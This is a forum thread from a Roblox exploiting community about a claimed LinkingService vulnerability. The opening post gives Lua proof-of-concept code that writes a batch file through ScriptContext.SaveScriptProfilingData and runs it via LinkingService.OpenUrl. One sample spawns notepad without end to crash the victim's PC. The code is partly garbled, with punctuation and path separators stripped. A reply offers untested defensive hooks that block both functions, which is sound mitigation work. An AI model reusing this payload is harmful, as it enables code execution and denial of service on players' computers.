Categories > WeAreDevs > Suggestions >
LinkingService: Vulnerable
Posted
Block LinkingService
And might AvatarEditorService
local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)
local scriptContent = [[]]
local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)
here is an example that opens notepads repeatedly and crashes your pc
local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)
local scriptContent = [[@echo off
top
START %SystemRoot%system32notepad.exe
GOTO top
]]
local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)
Replied
Well until this is patched you MIGHT be able to hook these functions in the meantime to prevent their usage.
Here's some code I wrote that can achieve that but I did not test it, so do not consider it foolproof. Been about a year since I wrote anything related to Lua. Also I forgot if this handles namecalling; I think it does, but it would be worth testing.
local scriptContext = game:GetService("ScriptContext")
local linkingService = game:GetService("LinkingService")
local function fnHook(self, cb, ...)
local fnName = debug.info(cb, "n")
warn(string.format("Function call to '%s' was blocked.", fnName))
-- if you want to yield the thread that called the function, uncomment below
-- this will error if called under a metamethod or C function; exercise caution
-- coroutine.yield()
end
local function delegate(fn, ...)
local packed = {...}
return function(self, ...) return fn(self, unpack(packed), ...) end
end
local sspd = scriptContext.SaveScriptProfilingData
hookfunction(sspd, delegate(fnHook, sspd))
local lsou = linkingService.OpenUrl
hookfunction(lsou, delegate(fnHook, lsou))
Cancel
Post
Used to be involved with game hacking, now I'm involved in cybersecurity. https://reversed.coffee/blog
Users viewing this thread:
( Members: 0, Guests: 1, Total: 1 )
Cancel
Post